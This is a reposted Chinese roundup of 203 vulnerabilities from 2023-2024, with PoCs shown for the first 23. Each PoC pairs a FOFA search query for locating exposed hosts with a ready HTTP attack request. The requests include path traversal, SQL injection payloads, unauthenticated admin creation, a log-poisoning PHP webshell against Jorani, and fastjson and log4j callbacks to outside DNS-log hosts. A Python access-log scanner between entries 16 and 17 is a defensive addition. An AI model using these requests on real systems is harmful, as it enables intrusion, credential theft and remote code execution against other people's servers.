Public Internet Vulnerability Roundup 202309-202406 (repost)
Posted 2024-6-5 14:31:29
Source: 道一安全, 2024-06-05 07:41, Beijing
The article below is from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploiting N-day vulnerabilities is one of the most common attack techniques seen in attack-defense exercises. This article is meant to help defenders, who can use its contents to check their own exposure.

Sources: the article covers 203 PoCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: all of these vulnerabilities are public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few PoCs that are too long have their payload replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the complete list as it stands; use F12 on the page and search for the keyword you need.

Bookmark this article if you need it, or follow the public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC smart IoT management platform arbitrary file read
21. 大华ICC smart IoT management platform random remote code execution
22. 大华ICC smart IoT management platform log4j remote code execution
23. 大华ICC smart IoT management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom/broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 construction quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communications dispatch platform down_file.php SQL injection
138. 福建科立讯 communications dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 firefighting dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 project management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

PoC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin interface with the default account admin, then send the following request (the command is injected through the wifiRebootrange field).
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained at login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request. The language parameter traverses into application/logs, so the PHP in the login field ends up in the day's log file; that PHP runs the base64-decoded value of a request header through system().
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (it decodes to echo ---------;id 2>&1;echo ---------;).
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls HASHBYTES inside the injected sorts field to compute the MD5 of 1234; the hash appearing in the response confirms the injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
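The introduction suggests defenders use this list for risk triage; the most direct way is to turn the request lines of entries 1-16 into access-log checks. The Python below is an added example and not part of the original roundup. The signature table, labels, the Combined Log Format parsing, the constructed sample log lines and the three normalization steps are my additions; only the paths, parameters and payload forms come from the PoCs above. The normalization matters because a plain substring match misses what these PoCs rely on: entry 9 encodes its payload twice, entry 14 hides the endpoint behind a servlet matrix parameter (`;.ico`), and entry 15 behind a dot-segment (`a.ico/../`), so the scanner decodes until the string is stable and routes the path the way a servlet container would before matching.

```python
import re
from urllib.parse import unquote

# Combined/Common Log Format request line: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Tricks from the PoCs that a plain substring match on the raw log line misses:
#   - entry 9: the payload is URL-encoded twice, so decode until stable
#   - entry 14: "getAllList;.ico" uses a matrix parameter that the container
#     strips before routing, so strip ";..." from each segment too
#   - entry 15: "a.ico/../getAllList" relies on dot-segment resolution
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")
GENERIC_SQL = re.compile(r"extractvalue\(|updatexml\(|waitfor\s+delay|@@version|hashbytes\(", re.I)

# (label, regex on the decoded or routed path, regex on the decoded query or None).
# Paths taken from entries 1-16 above; the Jorani rule matches step 3 of entry 12.
SIGNATURES = [
    ("StarRocks /mem_tracker (entry 1)", r"^/mem_tracker$", None),
    ("Casdoor /static traversal (entry 2)", r"^/static/.*\.\./", None),
    ("EasyCVR userlist (entry 3)", r"^/api/v1/userlist$", None),
    ("EasyCVR adduser (entry 4)", r"^/api/v1/adduser$", None),
    ("NUUO debugging_center_utils (entry 5)", r"^/__debugging_center_utils___\.php$", r"(?:^|&)log="),
    ("Sangfor NGAF loadfile.php (entry 6)", r"^/svpn_html/loadfile\.php$", r"(?:^|&)file="),
    ("808gps MobileAction_downLoad (entry 7)", r"^/808gps/MobileAction_downLoad\.action$", r"(?:^|&)path="),
    ("Phicomm luci wifireboot, review body (entry 8)", r"/admin/wifireboot$", None),
    ("Doccms keyword SQLi (entry 9)", r"^/search/index\.php$", r"(?:^|&)keyword=.*(?:extractvalue|updatexml)\("),
    ("Landray EIS api.aspx saveImg (entry 10)", r"^/eis/service/api\.aspx$", r"(?:^|&)action=saveImg"),
    ("Landray EIS doc_fileedit_word (entry 11)", r"^/dossier/doc_fileedit_word\.aspx$", r"(?:^|&)recordid=[^&]*'"),
    ("Jorani log view, step 3 (entry 12)", r"^/pages/view/log-\d{4}-\d{2}-\d{2}$", None),
    ("iOffice ioFileDown (entry 13)", r"^/ioffice/prg/interface/ioFileDown\.aspx$", r"(?:^|&)sFilePath="),
    ("jshERP getAllList (entries 14, 15)", r"^/jshERP-boot/user/getAllList$", None),
    ("HFOffice switch-value/list (entry 16)", r"^/api/switch-value/list$", r"(?:^|&)sorts=.*hashbytes\("),
]


def decode_fully(s, limit=3):
    """Percent-decode until the string stops changing (handles double encoding)."""
    for _ in range(limit):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize_target(target):
    """Return (decoded_path, routed_path, decoded_query, flags).

    routed_path approximates what a servlet container dispatches on: matrix
    parameters (";...") dropped from each segment and dot-segments resolved.
    """
    decoded = decode_fully(target)
    path, _, query = decoded.partition("?")
    flags = set()
    if TRAVERSAL.search(path):
        flags.add("dot-dot segment")
    if ";" in path:
        flags.add("semicolon in path")
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg == "..":
            if segments:
                segments.pop()
        elif seg not in ("", "."):
            segments.append(seg)
    return path, "/" + "/".join(segments), query, flags


def scan_line(line):
    """Return the signature labels and generic flags hit by one log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    path, routed, query, flags = normalize_target(m.group("target"))
    hits = []
    for label, path_re, query_re in SIGNATURES:
        path_ok = re.search(path_re, path) or re.search(path_re, routed)
        query_ok = query_re is None or re.search(query_re, query, re.I)
        if path_ok and query_ok:
            hits.append(label)
    if GENERIC_SQL.search(query):
        hits.append("generic: SQL function in query")
    hits.extend("generic: " + f for f in sorted(flags))
    return hits


def scan(log_text):
    """Map 1-based line numbers to their findings, skipping clean lines."""
    findings = {}
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings[lineno] = hits
    return findings


# Constructed sample log, not real traffic. Line 3 carries entry 9's payload
# URL-encoded twice; lines 4 and 5 are the two jshERP bypass forms.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /mem_tracker HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /static/../../../../../../etc/passwd HTTP/1.1" 200 1311 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Jan/2024:10:00:03 +0000] "GET /search/index.php?keyword=%2527%2520and%2520%2528extractvalue%25281%252Cconcat%25280x7e%252C%2528select%2520user%2528%2529%2529%252C0x7e%2529%2529%2529%2523 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2024:10:00:04 +0000] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2024:10:00:05 +0000] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Jan/2024:10:00:06 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

Feed each real log file's text to scan(). One caveat: decoding happens before the target is split on "?", so an encoded "?" or "&" inside a path would be misread; that is acceptable for triage but not for a blocking rule, where decoding and splitting must follow the application's own order.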
17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC smart IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC smart IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
The body is the usual fastjson autotype DNS-callback probe; it is deliberately not valid JSON, so body parsers that reject malformed JSON will not see it.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. 大华ICC smart IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC smart IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same probe as entry 21, with a DNSLOG placeholder.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
